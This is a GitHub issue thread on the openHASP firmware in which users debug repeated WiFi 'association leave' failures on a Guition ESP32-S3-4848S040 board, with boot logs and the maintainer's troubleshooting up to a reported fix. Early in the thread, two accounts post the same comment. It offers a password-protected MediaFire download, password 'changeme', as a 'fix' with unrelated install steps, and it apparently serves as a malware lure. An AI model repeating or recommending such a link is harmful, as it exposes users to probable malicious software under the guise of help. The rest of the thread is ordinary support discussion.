HASwitchPlate/openHASP #791: Wifi does not connect to ap in case of esp32-s3-4848s040_16MB

littlesmithsro, 2024-08-28:
Wifi cannot obtain ip address. If i choose GS-T3E v2.3 in https://nightly.openhasp.com/, wifi is working but display not.

Logs:

        open____ _____ _____ _____
          |  |  |  _  |   __|  _  |
          |     |     |__   |   __|
          |__|__|__|__|_____|__|
        Home Automation Switch Plate
        Open Hardware edition v0.7.0-rc12

[       0.083][212980/248748 14][    0/    0  0] DBUG: Started @ 115200 bps
#[       0.091][212980/248748 14][    0/    0  0] DBUG: Environment: esp32-s3-4848s040_16MB
#[       0.102][212980/248748 14][    0/    0  0] UART: Started
#[       0.109][212980/248748 14][    0/    0  0] UART: Client login from serial
#[       0.131][212980/248648 14][    0/    0  0] CONF: SPI flash FS mounted
Prompt > [       0.154][212980/248648 14][    0/    0  0] CONF: Loading /config.json
Prompt > [       0.164][212980/247896 14][    0/    0  0] CONF: Loaded /config.json
Prompt > [       0.173][212980/248712 14][    0/    0  0] DBUG: Loading debug settings
Prompt > [       0.183][212980/248712 14][    0/    0  0] GPIO: Loading GUI settings
Prompt > [       0.193][212980/248712 14][    0/    0  0] GUI : First Touch Calibration enabled
Prompt > [       0.203][212980/248712 14][    0/    0  0] HASP: Loading HASP settings
Prompt > [       0.213][212980/248712 14][    0/    0  0] WIFI: Loading WiFi settings
Prompt > [       0.242][212980/246788 13][    0/    0  0] MQTT: Loading MQTT settings
Prompt > [       0.260][212980/246788 13][    0/    0  0] TELN: Loading Telnet settings
Prompt > [       0.270][212980/246788 13][    0/    0  0] MDNS: Loading MDNS settings
Prompt > [       0.279][212980/246788 13][    0/    0  0] HTTP: Loading HTTP settings
Prompt > [       0.289][212980/246788 13][    0/    0  0] GPIO: Loading GPIO settings
Prompt > [       0.299][212980/246788 13][    0/    0  0] CONF: Settings loaded
Prompt > [       0.352][204788/217920  6][    0/    0  0] WIFI: Connecting to Spajza
Prompt > [       0.362][204788/217928  6][    0/    0  0] MSGR: Starting...
Prompt > [       0.371][204788/217928  6][    0/    0  0] MSGR: Started
Prompt > [       0.379][204788/217928  6][    0/    0  0] TFT : Starting...
Prompt > [       0.388][204788/217904  6][    0/    0  0] TFT : Starting...
Prompt > [       0.651][204788/215748  5][    0/    0  0] TFT : Started
Prompt > [       0.678][204788/215748  5][    0/    0  0] TFT : Started
Prompt > [       0.769][204788/215748  5][    0/    0  0] LVGL: Starting...
Prompt > [       0.782][155636/166380  6][62608/62832  1] LVGL: LV_FS_PC ready
Prompt > [       0.792][131060/141208  7][61908/61956  1] GUI : Initialize Cursor
Prompt > [       1.305][131060/140448  6][61816/61840  1] DRVR: GT911 Started (480x480)
Prompt > [       1.320][131060/140448  6][61816/61840  1] DRVR:     *  Found device 0x5d
Prompt > [       1.333][131060/140348  6][61576/61592  1] LVGL: Started
Prompt > [       1.350][131060/140348  6][59116/59756  2] HASP: Custom theme loaded
Prompt > [       1.372][131060/140348  6][58564/58568  1] HASP: Loading /pages.jsonl
Prompt > [       1.398][131060/140348  6][58448/58452  1] HASP: Loaded /pages.jsonl
Prompt > [       1.408][131060/140348  6][58448/58452  1] HASP: Changing page to 1
Prompt > [       1.418][131060/140348  6][58288/58292  1] GPIO: Starting...
Prompt > [       1.426][131060/140348  6][58288/58292  1] GPIO: Reboot counter 0
Prompt > [       1.435][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.444][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.453][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.462][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.471][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.480][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.489][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.498][131060/140348  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.506][131060/140348  6][58288/58292  1] GPIO: Started
Prompt > [       1.516][126964/135904  6][58288/58292  1] HTTP: Started
Prompt > [       1.526][126964/135336  6][58288/58292  1] TELN: Telnet console started
Prompt > [       1.535][126964/135336  6][58288/58292  1] FTP : Starting...
Prompt > [       1.544][126964/135336  6][58288/58292  1] FTP : Disabled
Prompt > [       1.575][126964/135336  6][58288/58292  1] MSGR: File not found: L:/boot.cmd
Prompt > [       1.589][122868/134264  8][58288/58292  1] MQTT: hasp/plate/LWT
Prompt > [       1.598][122868/134216  8][58288/58292  1] MQTT: hasp/plate/LWT
Prompt > [       1.608][122868/134436  8][58288/58292  1] MQTT: Broker not configured
Prompt > [       4.318][122868/134020  8][57964/58448  1] WIFI: authentication expired
Prompt > [       4.646][122868/134376  8][57964/58448  1] WIFI: No Connection... retry 1
Prompt > [       4.657][122868/134532  8][57964/58448  1] WIFI: Unknown error (0)
Prompt > [       7.675][122868/133848  8][57964/58448  1] WIFI: Connected to Spajza, requesting IP...
Prompt > [       9.653][122868/134116  8][57964/58448  1] WIFI: No Connection... retry 2
Prompt > [       9.664][122868/133972  8][57964/58448  1] WIFI: association leave
Prompt > [       9.674][122868/134272  8][57964/58448  1] WIFI: Unknown error (66)
Prompt > [      12.750][122868/133844  8][57964/58448  1] WIFI: Connected to Spajza, requesting IP...
Prompt > [      14.660][122868/134116  8][57964/58448  1] WIFI: No Connection... retry 4
Prompt > [      14.671][122868/133976  8][57964/58448  1] WIFI: association leave
Prompt > [      14.681][122868/134276  8][57964/58448  1] WIFI: Unknown error (66)
Prompt > [      17.742][122868/133844  8][57964/58448  1] WIFI: Connected to Spajza, requesting IP...
Prompt > [      19.666][122868/134116  8][57964/58448  1] WIFI: No Connection... retry 6
Prompt > [      19.677][122868/133976  8][57964/58448  1] WIFI: association leave
Prompt > [      19.687][122868/134276  8][57964/58448  1] WIFI: Unknown error (66)
Prompt > [      22.759][122868/133844  8][57964/58448  1] WIFI: Connected to Spajza, requesting IP...
Prompt > [      24.673][122868/134116  8][57964/58448  1] WIFI: No Connection... retry 8
Prompt > [      24.684][122868/134116  8][57964/58448  1] WIFI: association leave
Prompt > [      24.694][122868/134276  8][57964/58448  1] WIFI: Unknown error (66)

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

fvanroie, 2024-08-28:
For GS-T3E v2.3 you need the `[gs-t3e_full_16MB_v0.7.0-rc12_cd34d89.bin](https://nightly.openhasp.com/firmware/gs-t3e_full_16MB_v0.7.0-rc12_cd34d89.bin)` firmware instead of `esp32-s3-4848s040_16MB`.

littlesmithsro, 2024-08-28:
My chip is Guition ESP32-S3-4848S040. When i flash esp32-s3-4848s040_full_16MB_v0.7.0-rc12, wifi cannot connect. I tried flash gs-t3e_full_16MB_v0.7.0-rc12 only to check if wifi working.

fvanroie, 2024-08-28:
Some WiFi settings are stored in flash. Make sure to erase the full flash first before (re)installing different firmware files.

littlesmithsro, 2024-08-28:
Strange that i have this wifi problem only if i flash recommended .bin. In case of rc13 this bin file cause wifi problem: esp32-s3-4848s040_full_16MB_v0.7.0-rc13_042fe05 but this sitting in same directory: guition-jc4827w543c_full_4MB_v0.7.0-rc13_042fe05 works but without display

fvanroie, 2024-08-28:
Flashing random firmware for other devices is *not* recommended. Did you erase the flash before flashing `esp32-s3-4848s040_full_16MB_v0.7.0-rc13_042fe05`?

What device do you have specifically? Do you have the URL?
Maybe the vendor sent you a newer board revision or different hardware...

littlesmithsro, 2024-08-28:
Yes i tried erase flash before. My chip is: Chip is ESP32-S3 (QFN56) (revision v0.2)
Link: https://www.aliexpress.com/item/1005006335587633.html?spm=a2g0o.order_list.order_list_main.47.3f321802FZCf3K
[image]

littlesmithsro, 2024-08-29:
What about this logs?

Prompt > [ 1.418][131060/140348 6][58288/58292 1] GPIO: Starting...
Prompt > [ 1.426][131060/140348 6][58288/58292 1] GPIO: Reboot counter 0
Prompt > [ 1.435][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.444][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.453][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.462][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.471][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.480][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.489][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.498][131060/140348 6][58288/58292 1] GPIO: Invalid pin 0
Prompt > [ 1.506][131060/140348 6][58288/58292 1] GPIO: Started

can be this my problem?

littlesmithsro, 2024-08-29:
wifi without password works, i dont know how this is possible

RussH007, 2024-09-25:
I've just bought one of these - did you get the wifi working ?  thx

RobFerrer, 2024-10-25:
I'm getting exactly this problem with this board. Once just after I flashed it I seemed to get an ip address, and when I tried reflashing it I could connect to the initial Access Point, but I'm just getting the repeated error messages as above.

fvanroie, 2024-10-25:
Please provide all the information:
- Which device? (+link)
- Which firmware, full binary filename?
- Which error message exactly?
-Steps to reproduce

RobFerrer, 2024-10-25:
- Device: As in the photo above, bought from https://www.aliexpress.com/item/1005006348508626.html?spm=a2g0o.order_list.order_list_main.24.4f4d1802j1Oy5o
- Firmware, installed from https://nightly.openhasp.com. [esp32-s3-4848s040_full_16MB_v0.7.0-rc12_cd34d89.bin](https://nightly.openhasp.com/firmware/esp32-s3-4848s040_full_16MB_v0.7.0-rc12_cd34d89.bin) I believe.
- Error messages below
- To reproduce
  - Install binary as above
  - Open console
  - `ssid [wifi ssid]`
  - `pass [wifi password]`
  - `reboot`
Also happens if I enter the wifi details on screen, or connect to the ad-hoc network (which interestingly works). If I put an incorrect password in I get a different result, so it's getting part way through connecting. My DHCP server has assigned it an IP address.
```
Build:Mar 27 2021
rst:0xc (RTC_SW_CPU_RST),boot:0x18 (SPI_FAST_FLASH_BOOT)
Saved PC:0x420fd066
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fce3808,len:0x128
load:0x403c9700,len:0xb90
load:0x403cc700,len:0x28cc
entry 0x403c98b8

        open____ _____ _____ _____
          |  |  |  _  |   __|  _  |
          |     |     |__   |   __|
          |__|__|__|__|_____|__|
        Home Automation Switch Plate
        Open Hardware edition v0.7.0-rc12

[       0.093][212980/248792 14][    0/    0  0] DBUG: Started @ 115200 bps
#[       0.101][212980/248792 14][    0/    0  0] DBUG: Environment: esp32-s3-4848s040_16MB
#[       0.111][212980/248792 14][    0/    0  0] UART: Started
#[       0.119][212980/248792 14][    0/    0  0] UART: Client login from serial
#[       0.141][212980/248692 14][    0/    0  0] CONF: SPI flash FS mounted
Prompt > [       0.164][212980/248692 14][    0/    0  0] CONF: Loading /config.json
Prompt > [       0.174][212980/247924 14][    0/    0  0] CONF: Loaded /config.json
Prompt > [       0.183][212980/248756 14][    0/    0  0] DBUG: Loading debug settings
Prompt > [       0.193][212980/248756 14][    0/    0  0] GPIO: Loading GUI settings
Prompt > [       0.203][212980/248756 14][    0/    0  0] GUI : First Touch Calibration enabled
Prompt > [       0.213][212980/248756 14][    0/    0  0] HASP: Loading HASP settings
Prompt > [       0.223][212980/248756 14][    0/    0  0] WIFI: Loading WiFi settings
Prompt > [       0.250][212980/246832 13][    0/    0  0] MQTT: Loading MQTT settings
Prompt > [       0.265][212980/246832 13][    0/    0  0] TELN: Loading Telnet settings
Prompt > [       0.275][212980/246832 13][    0/    0  0] MDNS: Loading MDNS settings
Prompt > [       0.284][212980/246832 13][    0/    0  0] HTTP: Loading HTTP settings
Prompt > [       0.294][212980/246832 13][    0/    0  0] GPIO: Loading GPIO settings
Prompt > [       0.304][212980/246832 13][    0/    0  0] CONF: Settings loaded
Prompt > [       0.355][204788/217964  6][    0/    0  0] WIFI: Connecting to BTWholeHome-6CW
Prompt > [       0.366][204788/217924  6][    0/    0  0] MSGR: Starting...
Prompt > [       0.375][204788/217924  6][    0/    0  0] MSGR: Started
Prompt > [       0.383][204788/217924  6][    0/    0  0] TFT : Starting...
Prompt > [       0.392][204788/217888  6][    0/    0  0] TFT : Starting...
Prompt > [       0.655][204788/215728  5][    0/    0  0] TFT : Started
Prompt > [       0.682][204788/215728  5][    0/    0  0] TFT : Started
Prompt > [       0.772][204788/215728  5][    0/    0  0] LVGL: Starting...
Prompt > [       0.785][155636/166360  6][62608/62832  1] LVGL: LV_FS_PC ready
Prompt > [       0.796][131060/141188  7][61908/61956  1] GUI : Initialize Cursor
Prompt > [       1.308][131060/140428  6][61816/61840  1] DRVR: GT911 Started (480x480)
Prompt > [       1.323][131060/140420  6][61816/61840  1] DRVR:     *  Found device 0x5d
Prompt > [       1.336][131060/140320  6][61576/61592  1] LVGL: Started
Prompt > [       1.352][131060/140320  6][59116/59756  2] HASP: Custom theme loaded
Prompt > [       1.375][131060/140320  6][58564/58568  1] HASP: Loading /pages.jsonl
Prompt > [       1.401][131060/140320  6][58448/58452  1] HASP: Loaded /pages.jsonl
Prompt > [       1.411][131060/140320  6][58448/58452  1] HASP: Changing page to 1
Prompt > [       1.420][131060/140320  6][58288/58292  1] GPIO: Starting...
Prompt > [       1.429][131060/140320  6][58288/58292  1] GPIO: Reboot counter 0
Prompt > [       1.438][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.447][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.456][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.465][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.474][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.483][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.492][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.500][131060/140320  6][58288/58292  1] GPIO: Invalid pin 0
Prompt > [       1.509][131060/140320  6][58288/58292  1] GPIO: Started
Prompt > [       1.519][126964/135884  6][58288/58292  1] HTTP: Started
Prompt > [       1.528][126964/135316  6][58288/58292  1] TELN: Telnet console started
Prompt > [       1.538][126964/135316  6][58288/58292  1] FTP : Starting...
Prompt > [       1.547][126964/135316  6][58288/58292  1] FTP : Disabled
Prompt > [       1.577][126964/135316  6][58288/58292  1] MSGR: File not found: L:/boot.cmd
Prompt > [       1.591][122868/134244  8][58288/58292  1] MQTT: hasp/plate/LWT
[... cut ...]
Prompt > [       9.670][122868/134076  8][57964/58448  1] WIFI: association leave
Prompt > [       9.680][122868/134236  8][57964/58448  1] WIFI: Unknown error (66)
Prompt > [      12.867][122868/133820  8][57964/58448  1] WIFI: Connected to BTWholeHome-6CW, requesting IP...
Prompt > [      14.666][122868/134084  8][57964/58448  1] WIFI: No Connection... retry 4
Prompt > [      14.677][122868/134084  8][57964/58448  1] WIFI: association leave
Prompt > [      14.687][122868/134244  8][57964/58448  1] WIFI: Unknown error (66)
```

fvanroie, 2024-10-25:
Wifi issue are hard to troubleshoot. Maybe try these:
- Does it work without password?
- Does it work with a short(er) password?
- How long is the current password?
- Make sure to erase the full flash when (re)flashing firmware files.
- What router are you using?
- Which security protocol is configured?
- Do other firmwares work, like Tasmota, ESPhome, ...

RobFerrer, 2024-10-26:
Thanks for your response. I've tried a few things, I'm not sure what it tells me.

Firstly, I tried again flashing then entering the details onscreen, and I got the following logged:
```
[      94.538][114676/123784  7][55264/56132  2] MSGR: File not found: L:/idle_short.cmd
Prompt > [     111.201][114676/123784  7][55088/56132  2] MSGR: File not found: L:/idle_off.cmd
Prompt > [     176.444][114676/123260  6][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 1
Prompt > [     176.705][114676/123452  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 2
Prompt > [     176.966][114676/123452  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 3
Prompt > [     177.227][114676/123452  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 4
Prompt > [     177.488][114676/123452  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 5
Prompt > [     177.749][114676/123452  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 6
Prompt > [     178.010][114676/123452  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 7
Prompt > [     178.271][114676/123256  6][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 8
Prompt > [     178.532][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 9
Prompt > [     178.793][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 10
Prompt > [     179.054][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 11
Prompt > [     179.315][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 12
Prompt > [     179.576][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 13
Prompt > [     179.837][110580/122668  9][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 14
Prompt > [     180.098][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 15
Prompt > [     180.359][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 16
Prompt > [     180.620][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 17
Prompt > [     180.881][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 18
Prompt > [     181.142][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 19
Prompt > [     181.403][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 20
Prompt > [     181.664][114676/123312  7][55940/56048  1] WIFI: Connecting to BTWholeHome-6CW... 21
Prompt > [     181.925][110580/122724  9][55940/56048  1] WIFI: Received IP address 192.168.1.197
Prompt > [     181.938][110580/122772  9][55940/56048  1] OOBE: SSID BTWholeHome-6CW validated
Prompt > [     181.948][110580/120472  8][55940/56048  1] CONF: Loading /config.json
Prompt > [     181.959][110580/120268  8][55940/56048  1] CONF: Failed to load /config.json
Prompt > [     181.970][110580/120440  8][55940/56048  1] CONF: Loading EEPROM
Prompt > [     181.979][110580/120440  8][55940/56048  1] CONF: Loaded EEPROM
Prompt > [     181.988][110580/120504  8][55940/56048  1] CONF: Loaded /config.json
Prompt > [     182.008][110580/119600  7][55940/56048  1] CONF: Saving /config.json
Prompt > [     182.083][102388/119584 14][55940/56048  1] CONF: Saved /config.json
Prompt > [     182.093][110580/122804  9][55940/56048  1] MQTT: Disabled
Prompt > [     182.104][110580/123532 10][55940/56008  1] HTTP: Stopped
Prompt > [     182.140][114676/142528 19][55940/56008  1] WIFI: Stopped
Prompt > [     182.148][114676/142528 19][55940/56008  1] MSGR: Rebooting the MCU now!
Prompt > ESP-ROM:esp32s3-20210327
Build:Mar 27 2021
rst:0xc (RTC_SW_CPU_RST),boot:0x18 (SPI_FAST_FLASH_BOOT)
Saved PC:0x420fd066
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fce3808,len:0x128
load:0x403c9700,len:0xb90
load:0x403cc700,len:0x28cc
entry 0x403c98b8
```
It then rebooted into the error loop as before. As you can see, it connected to the WiFi and got an IP address, but then entered the state as before.

The password is 12 characters long.

I can't try on that AP without a password, although if I give it an incorrect password it doesn't even connect to the WiFi and get to the point of requesting an IP.

I'm using a Deco AP, and a plusnet router. I have told the Deco system only to use 2.4G and only to use one AP.

I tried to connect to my phone's hotspot (with a password), and that works.

I tried ESPHome. I flashed it through the web installer. Interestingly I couldn't set up the Wifi as I normally would do, but once I connected to the ad-hoc network and added details, the device connected to my AP absolutely fine, so there's no hardware incompatibility.

Security is WPA2

Every time I've reflashed I've told the web installer to erase the device.

When I was searching for support for this problem, I didn't search for this model, just for the error messages in OpenHASP, so it's interesting that the only other person having this problem has this hardware.

Let me know if there's anything I can do to help diagnose it. It looks like a particularly problem between my Wifi setup (the APs?), OpenHASP, and this hardware.

florianhaesters, 2025-05-23:
Same issue for me. Other wifi works fine, but not my home wifi (ssid "FRITZ!Box 7490"). Also does not work with shorter ssid and pw.

fvanroie, 2025-07-13:
What is your country? It could be that the WiFi needs a country setting to [configure the WiFi power](https://community.home-assistant.io/t/unable-to-connect-to-wifi-auth-expired-and-association-expired/678570).

You you have a TP-Link router?

RobFerrer, 2025-07-13:
I'm in the UK. Is there a way to change the power in OpenHasp? Generally esphome devices all work fine with my WiFi. 

The APs are tplink Deco devices

fvanroie, 2025-07-13:
> I'm in the UK. Is there a way to change the power in OpenHasp? Generally esphome devices all work fine with my WiFi.

Not yet, but it seems like a possible culprit I am looking into... I'm not familiar with the esphome default configuration, so any info on that could also help.

ESP-IDF allows for tweaking the WiFi power settings, set the wireless country code and allow router override.

TP link assosiation issues are also [reported on esphome](https://community.home-assistant.io/t/unable-to-connect-to-wifi-auth-expired-and-association-expired/678570). It's helpfull to deduce the possible issue.

RobFerrer, 2025-07-13:
I'm far from an expert, but I think those reported tplink issues were to do with DHCP, and I think these problems are at a different level, so that might be a red herring. My router (and DHCP server) isn't tplink anyway, it's just the access points.

I've got a lot of esphome devices (and some esp32s running wled), and WiFi setup has always just worked without needing extra config. I'm afraid I don't know anything about the internals.

I'm happy to try anything if you want me to, although I've got a busy couple of weeks so it may be a little while!

fvanroie, 2025-07-18:
Another user found a possible fix for this issue in #919 
This is now updated in the code and you can test the latest `guiton.zip` build from the Actions Tab.

fvanroie, 2025-07-29:
This should now be fixed in [the latest build](https://github.com/HASwitchPlate/openHASP/actions/runs/16606858700), as per #919

glauco34, 2025-08-31:
I just bought a "Guition ESP32-S3-4848S040", I flashed the firmware from v0.7.0-rc12 from https://nightly.openhasp.com/ and connected to wifi without problems (AP is a Deco P7 at 2.4ghz) the password is 11 characters with WPA2 security